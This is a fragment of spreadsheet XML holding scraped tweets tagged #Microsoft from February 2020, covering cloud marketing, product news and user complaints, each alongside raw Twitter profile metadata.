    <t>#Microsoft #virtual #datacenter that offers #business #solutions for less.  #Dynamics365 #Office365 #Microsoft365 through #subscription #licensing . #Emails #calendaring #collaboration #applications #office #security and more. Visit https://t.co/fi8EHzgF9M or Call (888)511-0143 https://t.co/sWCU7PwhlL</t>
  </si>
  <si>
    <t>Thu Feb 27 06:38:34 +0000 2020</t>
  </si>
  <si>
    <t>#KPMG combines #CyberSecurity, #data management and industry experience with #Microsofts technology to help clients improve their business protection. https://t.co/K3xnvIxLBD</t>
  </si>
  <si>
    <t>{'id': 194111256, 'id_str': '194111256', 'name': 'Rosa de Bruin', 'screen_name': 'rosadebruin', 'location': 'The Netherlands', 'description': 'Innovation team @KPMG_NL | Community Manager | moeder van twee dochters | Spain &amp; drop | #KPMGVitaal | Twittert op pers. titel', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 176, 'friends_count': 280, 'listed_count': 15, 'created_at': 'Thu Sep 23 13:18:41 +0000 2010', 'favourites_count': 748, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/681921206812061697/1Hf47lor_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/681921206812061697/1Hf47lor_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/194111256/1379192392',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</si>
  <si>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06:37:00 +0000 2020</t>
  </si>
  <si>
    <t>. @TexasChildrens #CISO Teresa Tonthat talks about their huge #DigitalTransformation which included moving over 700 applications to a #HybridCloud environment. 
#HybridIT #CTO #ITOps #HPEalliances #Microsoft https://t.co/A6Z0iHjrov</t>
  </si>
  <si>
    <t>Thu Feb 27 06:36:59 +0000 2020</t>
  </si>
  <si>
    <t>Let us manage your #Azure for you.
Our team of experienced IT Consultants will manage your Azure environment ensuring you get the most out of your investment. Find out more https://t.co/ZUkTFvH77Z
#Microsoft #Cloud https://t.co/fEEstmokS3</t>
  </si>
  <si>
    <t>Thu Feb 27 06:33:31 +0000 2020</t>
  </si>
  <si>
    <t>Interruptions of production at factories run by partners can cobble tech firm's revenue. #FMTNews #Microsoft https://t.co/zrOSM8U9Gj</t>
  </si>
  <si>
    <t>{'id': 102098902, 'id_str': '102098902', 'name': 'Free Malaysia Today', 'screen_name': 'fmtoday', 'location': 'ÃœT: 3.099457,101.681025', 'description': 'Free and Independent #FMTNews', 'url': 'https://t.co/vM93IUlKXC', 'entities': {'url': {'urls': [{'url': 'https://t.co/vM93IUlKXC', 'expanded_url': 'https://www.freemalaysiatoday.com/', 'display_url': 'freemalaysiatoday.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 121122, 'friends_count': 2, 'listed_count': 662, 'created_at': 'Tue Jan 05 16:17:15 +0000 2010', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 185546,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'http://pbs.twimg.com/profile_images/1813559094/twitter-thumb2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1813559094/twitter-thumb2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102098902/1572519602', 'profile_link_color': '4455A6', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 06:32:10 +0000 2020</t>
  </si>
  <si>
    <t>Updated Instagram for Windows 10 app now available to all https://t.co/qSm4CEvORm #microsoft #feedly</t>
  </si>
  <si>
    <t>Thu Feb 27 06:31:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Azure Cost Management + Billing updates  February 2020 https://t.co/5VI1veFJmk #Azure #Cost #Management #AzOps #DevOps #Developers #Cloud #Usage https://t.co/4CGzWfZIBa</t>
  </si>
  <si>
    <t>Thu Feb 27 06:30:42 +0000 2020</t>
  </si>
  <si>
    <t>Dependency Injection in Azure Functions with C# - Twilio #azure #microsoft #dev #dotnet  https://t.co/RQTZh60TnI</t>
  </si>
  <si>
    <t>Thu Feb 27 06:30:10 +0000 2020</t>
  </si>
  <si>
    <t>Keep your assets safer with the #IoT industrys only end-to-end security solution
Start your journey with a trusted MSP - https://t.co/CAuyeZs5Ir 
#Microsoft #azure #IoT #Security #cloud #microsoftpartner #devops #azureiothub #azureiot #device #cloudtechnology #microsoftazure https://t.co/8HVEkNBEQz</t>
  </si>
  <si>
    <t>Thu Feb 27 06:30:03 +0000 2020</t>
  </si>
  <si>
    <t>#Myntra has worked closely with #Microsoft to #migrate its #platform - from #SupplyChain #management to #inventory to #site #capabilities. #apparelindustry  #cloudtransformation https://t.co/tMGhYU7ckK</t>
  </si>
  <si>
    <t>{'id': 3182737400, 'id_str': '3182737400', 'name': 'Rakesh Goel - ADMnext Ninja', 'screen_name': 'RakeshRGoel', 'location': '', 'description': 'Sr Director @Capgemini\nDreamer : Influencer : Guest of Honor : CSR : Blogger : Fellowship Award for Innovation : Key Note Speaker : Like kev sau xov xwm : Vegan', 'url': 'https://t.co/XgFc4nXsl5', 'entities': {'url': {'urls': [{'url': 'https://t.co/XgFc4nXsl5', 'expanded_url': 'http://www.rakeshgoel.com', 'display_url': 'rakeshgoel.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16144, 'friends_count': 16060, 'listed_count': 50, 'created_at': 'Sat May 02 10:33:08 +0000 2015', 'favourites_count': 3398, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8124,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'http://pbs.twimg.com/profile_images/602880733770686464/UlpOUek1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/602880733770686464/UlpOUek1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3182737400/1580372117',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</si>
  <si>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06:29:17 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft releases Windows 10 Insider Build 19041.84 via WSUS https://t.co/lJq1ydc6tE #microsoft #feedly</t>
  </si>
  <si>
    <t>Thu Feb 27 06:27:14 +0000 2020</t>
  </si>
  <si>
    <t>Facebook is cracking down on ads that promise to cure coronavirus https://t.co/ChJQO1ZVhd #microsoft #feedly</t>
  </si>
  <si>
    <t>Thu Feb 27 06:26:41 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft announces new default background image on Azure AD and Microsoft 365 sign-in screens https://t.co/elFcEmzsj2 #microsoft #feedly</t>
  </si>
  <si>
    <t>Thu Feb 27 06:26:03 +0000 2020</t>
  </si>
  <si>
    <t>Restore deleted channel, check Audit logs and apply Retention policy in Microsoft Teams.
#msteams #microsoft #microsoft365
https://t.co/9aa7LC0w95</t>
  </si>
  <si>
    <t>{'id': 1038016331537416192, 'id_str': '1038016331537416192', 'name': 'Microsoft 365 Talks', 'screen_name': 'Talks365', 'location': 'Mumbai, India', 'description': 'Microsoft 365 Enthusiast. Find videos, blogs &amp; updates on #Office365 #Microsoft365', 'url': 'https://t.co/nswh5ow2V3', 'entities': {'url': {'urls': [{'url': 'https://t.co/nswh5ow2V3', 'expanded_url': 'https://www.ms365talks.com', 'display_url': 'ms365talks.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 23, 'friends_count': 48, 'listed_count': 0, 'created_at': 'Fri Sep 07 10:49:13 +0000 2018', 'favourites_count': 54, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1050261370812411904/29CXCZOV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1050261370812411904/29CXCZOV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1038016331537416192/1536318267',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</si>
  <si>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06:15:14 +0000 2020</t>
  </si>
  <si>
    <t>Were you aware you can improve your staff productivity with only small amounts of focused training for the #Microsoft products they use? #Word https://t.co/rok1gRqGal</t>
  </si>
  <si>
    <t>Thu Feb 27 06:15:03 +0000 2020</t>
  </si>
  <si>
    <t>In the shadow of #Amazon and #Microsoft, Seattle #startups are having a moment  TechCrunch https://t.co/Aq9KWNZuGM #TechJunkieNews https://t.co/2N7rUJwarx</t>
  </si>
  <si>
    <t>Thu Feb 27 06:13:14 +0000 2020</t>
  </si>
  <si>
    <t>Are you looking for an opportunity to showcase your expertise in Microsoft 365? Submit your presentation for the upcoming #Vancouver #SharePoint Saturday event on March 28th today: https://t.co/bCX9fCEmYM
#SPSVancouver #SPS_Events #MicrosoftTeams #Microsoft #Office365 https://t.co/UrJsMuqYZM</t>
  </si>
  <si>
    <t>Thu Feb 27 06:11:35 +0000 2020</t>
  </si>
  <si>
    <t>I couldnt help but feel a little betrayed with Surface Duo. I think that there never should be a "Surface" device with Android. Ths devices must be work with WINDOWS!!! Bye-bye productivity ... 
#Windows #Smartphones #surface #Microsoft #device</t>
  </si>
  <si>
    <t>{'id': 843025464, 'id_str': '843025464', 'name': 'El Deivid \uf8ff', 'screen_name': 'deividmarshall', 'location': 'EspaÃ±a', 'description': 'El cÃ³digo... mi pasiÃ³n y perdiciÃ³n... el arte liberal de programar, imaginar y crear... soÃ±ar. Desarrollador iOS y redactor, dos grandes pasiones y un Ãºnico fin', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 231, 'friends_count': 237, 'listed_count': 4, 'created_at': 'Mon Sep 24 05:58:21 +0000 2012', 'favourites_count': 1891, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3514,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'http://pbs.twimg.com/profile_images/1145565594445635585/931jQmjd_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145565594445635585/931jQmjd_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/843025464/1491256861',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</si>
  <si>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06:02:38 +0000 2020</t>
  </si>
  <si>
    <t>Digital transformation is powering open-source collaboration in China. Where is your company on the path to digital transformation? Contact us to learn how PiFi Technologies LLC can accelerate your journey with #Microsoft #Azure. https://t.co/H1WFyAA7mj</t>
  </si>
  <si>
    <t>{'id': 1226897314838728704, 'id_str': '1226897314838728704', 'name': 'PiFi Technologies LLC - Contact sales@pifitech.com', 'screen_name': 'pifitech', 'location': 'Dubai, UAE', 'description': 'PiFi Technologies LLC is based in Dubai, UAE &amp; we provide leading IT Applications, Hardware, Software &amp; Cyber Security Solutions &amp; Services to our clients.', 'url': 'https://t.co/b5AGsP76pN', 'entities': {'url': {'urls': [{'url': 'https://t.co/b5AGsP76pN', 'expanded_url': 'https://www.pifitech.com', 'display_url': 'pifitech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 246, 'listed_count': 0, 'created_at': 'Mon Feb 10 15:55:58 +0000 2020', 'favourites_count': 7,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'http://pbs.twimg.com/profile_images/1226897688249151489/azwz2J7J_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226897688249151489/azwz2J7J_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1226897314838728704/1581351763',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</si>
  <si>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06:00:47 +0000 2020</t>
  </si>
  <si>
    <t>Digital transformation is powering open-source collaboration in China. Where is your company on the path to digital transformation? Contact us to learn how Hosting In SA can accelerate your journey with #Microsoft #Azure. https://t.co/9UvSWkLC4q</t>
  </si>
  <si>
    <t>{'id': 1126124926052835328, 'id_str': '1126124926052835328', 'name': 'Web Design Ninjas', 'screen_name': 'ninjas_web', 'location': 'South Africa', 'description': 'We are Web designers who bring your projects to life with Premium themes and awesome Marketing tools to grow your business.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 14, 'friends_count': 36, 'listed_count': 0, 'created_at': 'Wed May 08 14:01:19 +0000 2019', 'favourites_count': 47, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 246, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1126125303707914246/mI6A5myU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126125303707914246/mI6A5myU_normal.jpg',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</si>
  <si>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06:00:25 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft unveil plans for @Halo esports moving forward.
#ArenaEsports https://t.co/qG46NT4THp</t>
  </si>
  <si>
    <t>{'id': 803012554834341889, 'id_str': '803012554834341889', 'name': 'Unbeaten Esports', 'screen_name': 'unbeatenesports', 'location': '', 'description': 'Bringing you the best esports action every week from around the gaming globe.', 'url': 'https://t.co/xFRp4LsjJE', 'entities': {'url': {'urls': [{'url': 'https://t.co/xFRp4LsjJE', 'expanded_url': 'https://www.unbeaten.com/esports', 'display_url': 'unbeaten.com/esports', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 316, 'friends_count': 302, 'listed_count': 3, 'created_at': 'Sun Nov 27 23:08:07 +0000 2016', 'favourites_count': 78, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 707, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232079904960733184/XkrvL2kX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232079904960733184/XkrvL2kX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/803012554834341889/1538634971',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</si>
  <si>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06:00:19 +0000 2020</t>
  </si>
  <si>
    <t>Azure Offline Backup with Azure Data Box now in preview
https://t.co/aEb5LPhWDn 
#Microsoft #azure #cloud #clouds #cloudsecurity #networking  #issquared  #hybridcloud  #data #backup</t>
  </si>
  <si>
    <t>Thu Feb 27 06:00:05 +0000 2020</t>
  </si>
  <si>
    <t>As the demand for large-scale data in #Azure grows, the need to get real-time data into Azure effectively accelerates.  Join #Qlik and #Microsoft roadshow to learn more. https://t.co/qWXdFDerAQ</t>
  </si>
  <si>
    <t>Thu Feb 27 06:00:01 +0000 2020</t>
  </si>
  <si>
    <t>Create a frictionless journey for your customers, by bringing together the needs and activities of stakeholder management, marketing, customer service and sales into one platform. #Dynamics365 @MicrosoftAU #Microsoft
https://t.co/ajAIwJk25d</t>
  </si>
  <si>
    <t>{'id': 118400439, 'id_str': '118400439', 'name': 'Data#3 Ltd (ASX:DTL)', 'screen_name': 'Data3Limited', 'location': 'Data#3 | Brisbane Australia', 'description': 'Data#3 Limited is an ASX-listed company that delivers transformative solutions and services to help solve complex business challenges and enable success.', 'url': 'https://t.co/7ejpyQv5Ae', 'entities': {'url': {'urls': [{'url': 'https://t.co/7ejpyQv5Ae', 'expanded_url': 'http://www.data3.com.au', 'display_url': 'data3.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1830, 'friends_count': 976, 'listed_count': 116, 'created_at': 'Sun Feb 28 15:25:43 +0000 2010', 'favourites_count': 2003, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5385, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'CCCCCC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/947956669769646080/SBhVREIm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/947956669769646080/SBhVREIm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/118400439/1555020582', 'profile_link_color': '0065BD', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'CFCBCB', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 05:59:55 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> https://microsoftcloud.bakbakum.net
Suspected #phishing #opendir
AS23352 [204.93.193.167]
Let's Encrypt Authority X3
Keywords: #microsoft
https://t.co/xHBUakXW9t</t>
  </si>
  <si>
    <t>Thu Feb 27 05:46:27 +0000 2020</t>
  </si>
  <si>
    <t>Rise and shine! Im ready for #MSIgniteTheTour today in #Copenhagen. Come say hi  #configmgr #msintune #intune #microsoft #memcm</t>
  </si>
  <si>
    <t>{'id': 2519749610, 'id_str': '2519749610', 'name': 'Martin Bengtsson [MVP]', 'screen_name': 'mwbengtsson', 'location': 'Copenhagen, Denmark', 'description': 'Microsoft MVP - Enterprise Mobility #ConfigMgr | #MSIntune | #MEM | #Windows10 | #Office365 | #Azure | Blogging on https://t.co/ralazO1nNB', 'url': 'https://t.co/aBHmmzMJ5O', 'entities': {'url': {'urls': [{'url': 'https://t.co/aBHmmzMJ5O', 'expanded_url': 'https://www.imab.dk', 'display_url': 'imab.dk', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ralazO1nNB', 'expanded_url': 'http://imab.dk', 'display_url': 'imab.dk', 'indices': [115, 138]}]}}, 'protected': False, 'followers_count': 2232, 'friends_count': 469, 'listed_count': 44, 'created_at': 'Sat May 24 07:12:26 +0000 2014', 'favourites_count': 3849, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3529,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False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/709651255031947266/WEcdBCe9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/709651255031947266/WEcdBCe9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2519749610/1555066717',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</si>
  <si>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05:45:33 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Expects Lower Sales of Windows, Surface Devices Due to Coronavirus
https://t.co/hNph1o13Zv 
#technews #Microsoft #Windows</t>
  </si>
  <si>
    <t>{'id': 1874579930, 'id_str': '1874579930', 'name': 'Mark Allen', 'screen_name': 'markallen1985', 'location': '', 'description': 'TechLover', 'url': 'http://t.co/Rcj9VwuAgJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/Rcj9VwuAgJ', 'expanded_url': 'http://www.algoworks.com/', 'display_url': 'algoworks.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 101, 'friends_count': 454, 'listed_count': 103, 'created_at': 'Tue Sep 17 07:46:27 +0000 2013', 'favourites_count': 1485, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1783,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'http://pbs.twimg.com/profile_images/740139357508509696/bTQZxFdv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/740139357508509696/bTQZxFdv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1874579930/1543223886',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</si>
  <si>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05:41:26 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to miss sales forecast due to COVID-19 outbreak #CoronaVirusUpdates 
https://t.co/WQMUURANgy</t>
  </si>
  <si>
    <t>{'id': 3171641498, 'id_str': '3171641498', 'name': 'Kalinga TV', 'screen_name': 'Kalingatv', 'location': 'Odisha, India', 'description': 'When it comes to Breaking News, Kalinga TV leads the Way with 24x7 Coverage.', 'url': 'https://t.co/lrXWPUyDYx', 'entities': {'url': {'urls': [{'url': 'https://t.co/lrXWPUyDYx', 'expanded_url': 'http://kalingatv.com', 'display_url': 'kalingatv.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35184, 'friends_count': 192, 'listed_count': 65, 'created_at': 'Sat Apr 25 04:37:23 +0000 2015', 'favourites_count': 454, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 58920,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'http://pbs.twimg.com/profile_images/1032290581043732480/JnVinurZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1032290581043732480/JnVinurZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3171641498/1583318032',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</si>
  <si>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05:36:44 +0000 2020</t>
  </si>
  <si>
    <t>Going live on #Mixer for the second time dont miss out these are my hunting hours                                  P.S. for all you #twitchtv vierwers be sure to checkout @Ramen_2_Go stream!! #APEX #ApexLegends #Xbox #XboxOne #twitchstreamer #mixerstreamer #Xbox #Microsoft https://t.co/ndoGf0ZlrS</t>
  </si>
  <si>
    <t>Thu Feb 27 05:32:02 +0000 2020</t>
  </si>
  <si>
    <t>Google rolls out Titan keys to Europe, Japan. Plus: Group Policy bug is a feature, not a flaw, says Microsoft  The Register
#cybersecurity #google #microsoft  #tech  https://t.co/CtZRoxjX6o</t>
  </si>
  <si>
    <t>{'id': 20407396, 'id_str': '20407396', 'name': 'Michael McAdams', 'screen_name': 'BurnoutBLU', 'location': '', 'description': "I'm an #Artist ðŸŽ¨, #IT #Engineer ðŸ’», #Cybersecurity geek ðŸ›¡ï¸, #Coffee connoisseur â˜•ï¸, #Travel ðŸš™ &amp; #Weather nerd ðŸŒªï¸, and a #Gamer ðŸŽ®.", 'url': 'https://t.co/Rrq7pqC2ox', 'entities': {'url': {'urls': [{'url': 'https://t.co/Rrq7pqC2ox', 'expanded_url': 'https://burnoutblusbolsteredblog.blogspot.com/p/blog-page_22.html', 'display_url': 'burnoutblusbolsteredblog.blogspot.com/p/blog-page_22â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3170, 'friends_count': 4984, 'listed_count': 295, 'created_at': 'Mon Feb 09 01:45:15 +0000 2009', 'favourites_count': 12451, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9794,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'http://pbs.twimg.com/profile_images/1184108383328186371/EKucC-5K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1184108383328186371/EKucC-5K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20407396/1517970501', 'profile_link_color': '3B94D9',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</si>
  <si>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Feb 27 05:30:24 +0000 2020</t>
  </si>
  <si>
    <t>World NGO Day is marked on February 27 every year. This day aims to inspire people to become more actively involved with NGOs.
Visit us at: https://t.co/M0I8RL57Wk
#CRM #MicrosoftDynamics365 #Dynamics365 #Microsoft #Soluzione #worldngoday #ngo #nonprofit #charity https://t.co/k6Y1BDad4h</t>
  </si>
  <si>
    <t>Thu Feb 27 05:30:01 +0000 2020</t>
  </si>
  <si>
    <t>Get certified in cloud basics. Attend the #Microsoft #Azure Training Day: Fundamentals event in Mumbai on 28th February. Register here: https://t.co/cW04rTfp9T https://t.co/TsCBkGmi7h</t>
  </si>
  <si>
    <t>Thu Feb 27 05:29:47 +0000 2020</t>
  </si>
  <si>
    <t>World NGO Day is marked on February 27 every year. This day aims to inspire people to become more actively involved with NGOs.
Visit us at: https://t.co/6eGLwfibxg
#CRM #MicrosoftDynamics365 #Dynamics365 #Microsoft #Soluzione #worldngoday #ngo #nonprofit #charity https://t.co/NGL5EuI4Op</t>
  </si>
  <si>
    <t>Thu Feb 27 05:26:37 +0000 2020</t>
  </si>
  <si>
    <t>#ThursdayThoughts Googles new terms of service will come into effect on March 31
#google #improvedreadability #technews #techpout #techupdates #techfacts #techworld #TechForGood #technology #techno #techtips #Microsoft #technologies #tech4all 
https://t.co/5uj1J7ubas</t>
  </si>
  <si>
    <t>Thu Feb 27 05:05:17 +0000 2020</t>
  </si>
  <si>
    <t>Burst 4K encoding on #Azure Kubernetes Service https://t.co/EzgfNLJoFo #cloud #microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 05:01:41 +0000 2020</t>
  </si>
  <si>
    <t>Video of #Microsoft Surface Duos Peek feature shows how the dual-screen handset will work https://t.co/pxqKpEu1Aq</t>
  </si>
  <si>
    <t>{'id': 56433489, 'id_str': '56433489', 'name': 'TeknoFix', 'screen_name': 'TeknoFix', 'location': 'Vallejo, CA', 'description': '#ComputerRepair #PcRepairs, #WiFi #Network #WebDesign #DataBackup #HouseCalls #VirusRemoval | #AmericanCanyon #Napa #Yountville #Calistoga #Vallejo #Fairfield', 'url': 'https://t.co/K2BbMYLWNL', 'entities': {'url': {'urls': [{'url': 'https://t.co/K2BbMYLWNL', 'expanded_url': 'http://www.teknofix.com', 'display_url': 'teknofix.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3218, 'friends_count': 3413, 'listed_count': 48, 'created_at': 'Mon Jul 13 17:25:32 +0000 2009', 'favourites_count': 342, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5383, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '010002', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/457237287613394946/7IfG-a_B_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/457237287613394946/7IfG-a_B_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/56433489/1558643817', 'profile_link_color': '145878', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'CACEDB', 'profile_text_color': '974D10', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 05:00:05 +0000 2020</t>
  </si>
  <si>
    <t>Calling all Linux lovers. Find everything you need to know about deploying and managing #Linux workloads on #Azure. Get the e-book and learn more: https://t.co/pAL50MLJ5D   #microsoftloveslinux #Microsoft https://t.co/IOt3xHZwBs #MSFTAdvocate</t>
  </si>
  <si>
    <t>{'id': 431077919, 'id_str': '431077919', 'name': 'Roman Haug', 'screen_name': 'DerRoman77', 'location': 'Around the world', 'description': 'Consultant and #MSFT. These are my tweets and do not reflect the views of Microsoft. Seatte @Seahawks Fan', 'url': 'https://t.co/BndeWQrawG', 'entities': {'url': {'urls': [{'url': 'https://t.co/BndeWQrawG', 'expanded_url': 'http://romanhaug.de', 'display_url': 'romanhaug.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 179, 'friends_count': 714, 'listed_count': 89, 'created_at': 'Wed Dec 07 22:05:43 +0000 2011', 'favourites_count': 1199, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5395,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'http://pbs.twimg.com/profile_images/623553512966787072/Y6lcO1C1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/623553512966787072/Y6lcO1C1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/431077919/1399300788', 'profile_link_color': '0E59F0',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</si>
  <si>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Feb 27 05:00:00 +0000 2020</t>
  </si>
  <si>
    <t>#Chipotle Mexican Grill builds new website with .NET Core, Visual Studio Code, &amp;amp; #TypeScript - #Microsoft #Azure Mike Smith https://t.co/UsT2an5fJZ #MSFTAdvocate</t>
  </si>
  <si>
    <t>Thu Feb 27 04:57:38 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 04:52:43 +0000 2020</t>
  </si>
  <si>
    <t>Thanks, #Microsoft. Your idiotic #OneDrive application, which I NEVER asked to have installed, has been identified by my malware app as a TROJAN. This must be why all my accounts have been getting compromised.</t>
  </si>
  <si>
    <t>{'id': 34316975, 'id_str': '34316975', 'name': 'Neveryoumind', 'screen_name': 'TheRealArtzilla', 'location': 'Skatetown, USA', 'description': '"Is you is or is you ain\'t mah baby?"', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 174, 'friends_count': 155, 'listed_count': 10, 'created_at': 'Wed Apr 22 16:24:17 +0000 2009', 'favourites_count': 4769, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 22792,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'http://pbs.twimg.com/profile_images/1187623781185052672/doZqPXjE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187623781185052672/doZqPXjE_normal.jpg',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</si>
  <si>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Thu Feb 27 04:49:58 +0000 2020</t>
  </si>
  <si>
    <t>#LoveAtFirstShot #fusionhumor
Microsoft OneDrive App for Android gets dark mode, new icons, and a design refresh with enhanced PDF annotation, and so on. It helps all users to be connected from anywhere and on any device.
#Microsoft #onedrive 
READ MORE https://t.co/jyhmk8huuN https://t.co/gVWUQWIp0s</t>
  </si>
  <si>
